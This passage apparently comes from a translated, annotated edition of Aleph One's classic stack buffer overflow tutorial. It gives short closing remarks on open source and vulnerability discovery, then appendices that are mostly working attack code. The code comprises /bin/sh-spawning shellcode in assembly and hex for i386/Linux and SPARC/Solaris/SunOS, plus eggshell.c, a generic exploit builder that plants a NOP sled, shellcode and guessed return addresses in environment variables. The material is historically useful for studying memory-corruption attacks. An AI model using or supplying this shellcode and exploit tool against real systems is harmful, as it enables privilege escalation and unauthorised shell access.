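Aleph One ends with brief remarks on the relationship between open source and commercial operating systems and utilities. The gist is as follows. One of the difficulties of studying security and hacking is that we rarely get the chance to use expensive servers directly, a difficulty that the author and the readers share. The same holds for the applications that run on such servers. For operating systems such as Linux and for applications whose source is public, vulnerabilities are announced frequently on security mailing lists. This does not necessarily mean that open source has more security vulnerabilities than expensive servers or closed-source commercial applications. When the source is not public, there is simply less opportunity to find the vulnerabilities. Ironically, many utilities in commercial operating systems derive from the same sources as their open-source counterparts. This gives us a basis for inferring vulnerabilities in closed-source commercial programs that perform similar functions. Open source should therefore be put to good use as an aid to discovering vulnerabilities.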

Appendix A - Shellcode for Different Operating Systems/Architectures
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

i386/Linux

    jmp    0x1f
    popl   %esi
    movl   %esi,0x8(%esi)
    xorl   %eax,%eax
    movb   %eax,0x7(%esi)
    movl   %eax,0xc(%esi)
    movb   $0xb,%al
    movl   %esi,%ebx
    leal   0x8(%esi),%ecx
    leal   0xc(%esi),%edx
    int    $0x80
    xorl   %ebx,%ebx
    movl   %ebx,%eax
    inc    %eax
    int    $0x80
    call   -0x24
    .string "/bin/sh"

SPARC/Solaris

    sethi  0xbd89a, %l6
    or     %l6, 0x16e, %l6
    sethi  0xbdcda, %l7
    and    %sp, %sp, %o0
    add    %sp, 8, %o1
    xor    %o2, %o2, %o2
    add    %sp, 16, %sp
    std    %l6, [%sp - 16]
    st     %sp, [%sp - 8]
    st     %g0, [%sp - 4]
    mov    0x3b, %g1
    ta     8
    xor    %o7, %o7, %o0
    mov    1, %g1
    ta     8

SPARC/SunOS

    sethi  0xbd89a, %l6
    or     %l6, 0x16e, %l6
    sethi  0xbdcda, %l7
    and    %sp, %sp, %o0
    add    %sp, 8, %o1
    xor    %o2, %o2, %o2
    add    %sp, 16, %sp
    std    %l6, [%sp - 16]
    st     %sp, [%sp - 8]
    st     %g0, [%sp - 4]
    mov    0x3b, %g1
    mov    -0x1, %l5
    ta     %l5 + 1
    xor    %o7, %o7, %o0
    mov    1, %g1
    ta     %l5 + 1

Appendix B - Generic Buffer Overflow Program
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

shellcode.h

    #if defined(__i386__) && defined(__linux__)

    #define NOP_SIZE 1
    char nop[] = "\x90";
    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    unsigned long get_sp(void) {
        __asm__("movl %esp,%eax");
    }

    #elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)

    #define NOP_SIZE 4
    char nop[] = "\xac\x15\xa1\x6e";
    char shellcode[] =
        "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
        "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
        "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
        "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";

    unsigned long get_sp(void) {
        __asm__("or %sp, %sp, %i0");
    }

    #elif defined(__sparc__) && defined(__sun__)

    #define NOP_SIZE 4
    char nop[] = "\xac\x15\xa1\x6e";
    char shellcode[] =
        "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
        "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
        "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
        "\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";

    unsigned long get_sp(void) {
        __asm__("or %sp, %sp, %i0");
    }

    #endif

eggshell.c

    /*
     * eggshell v1.0
     *
     * Aleph One / [email protected]
     */
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include "shellcode.h"

    #define DEFAULT_OFFSET        0
    #define DEFAULT_BUFFER_SIZE   512
    #define DEFAULT_EGG_SIZE      2048

    void usage(void);

    void main(int argc, char *argv[]) {
        char *ptr, *bof, *egg;
        long *addr_ptr, addr;
        int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
        int i, n, m, c, align = 0, eggsize = DEFAULT_EGG_SIZE;

        /* Loop over the options with getopt() and set align, bsize,
           eggsize and offset. */
        while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF)
            switch (c) {
            case 'a':
                align = atoi(optarg);
                break;
            case 'b':
                bsize = atoi(optarg);
                break;
            case 'e':
                eggsize = atoi(optarg);
                break;
            case 'o':
                offset = atoi(optarg);
                break;
            case '?':
                usage();
                exit(0);
            }

        /* Exit if the shellcode is larger than eggsize. */
        if (strlen(shellcode) > eggsize) {
            printf("Shellcode is larger than the egg.\n");
            exit(0);
        }

        /* Allocate memory for bof; exit on failure. */
        if (!(bof = malloc(bsize))) {
            printf("Can't allocate memory.\n");
            exit(0);
        }

        /* Allocate memory for egg; exit on failure. */
        if (!(egg = malloc(eggsize))) {
            printf("Can't allocate memory.\n");
            exit(0);
        }

        /* The value that will overwrite the return address (addr) is the
           current stack pointer minus offset. addr serves as the expected
           start address of the environment variable EGG. */
        addr = get_sp() - offset;
        printf("[ Buffer size:\t%d\t\tEgg size:\t%d\tAlignment:\t%d\t]\n",
               bsize, eggsize, align);
        printf("[ Address:\t0x%lx\tOffset:\t\t%d\t\t\t\t]\n", addr, offset);

        /* Store the expected start address (addr) through addr_ptr across
           bsize bytes. bof then contains:

           0                                        bsize
           [ addr ][ addr ][ addr ] ... [ addr ]
        */
        addr_ptr = (long *) bof;
        for (i = 0; i < bsize; i += 4)
            *(addr_ptr++) = addr;

        /* Fill egg with NOPs for eggsize minus the size of the shellcode.
           egg then contains:

           0                                                   eggsize
           [ NOP ][ NOP ][ NOP ] ... [ NOP ][ NOP ][ garbage ]
        */
        ptr = egg;
        for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE)
            /* NOP_SIZE differs between CPUs, so each NOP is written byte by
               byte, rotated by align. NOP_SIZE and nop[] are declared in
               shellcode.h. */
            for (n = 0; n < NOP_SIZE; n++) {
                m = (n + align) % NOP_SIZE;
                *(ptr++) = nop[m];
            }

        /* Copy the shellcode into the [ garbage ] part of egg.
           egg then contains:

           0                                                   eggsize
           [ NOP ][ NOP ][ NOP ] ... [ NOP ][ NOP ][ shellcode ]
        */
        for (i = 0; i < strlen(shellcode); i++)
            *(ptr++) = shellcode[i];

        /* Write "EGG=" into the first 4 bytes of egg and "RET=" into the
           first 4 bytes of bof, then register both as environment variables
           with putenv(). The new /bin/sh started by system() inherits EGG
           and RET.

           -=[ egg ]=-
           0                                                   eggsize
           [ EGG= ][ NOP ][ NOP ] ... [ NOP ][ NOP ][ shellcode ]

           -=[ bof ]=-
           0                                        bsize
           [ RET= ][ addr ][ addr ] ... [ addr ]
        */
        bof[bsize - 1] = '\0';
        egg[eggsize - 1] = '\0';
        memcpy(egg, "EGG=", 4);
        putenv(egg);
        memcpy(bof, "RET=", 4);
        putenv(bof);
        system("/bin/sh");
    }

    void usage(void) {
        (void)fprintf(stderr,
            "usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o <offset>]\n");
    }
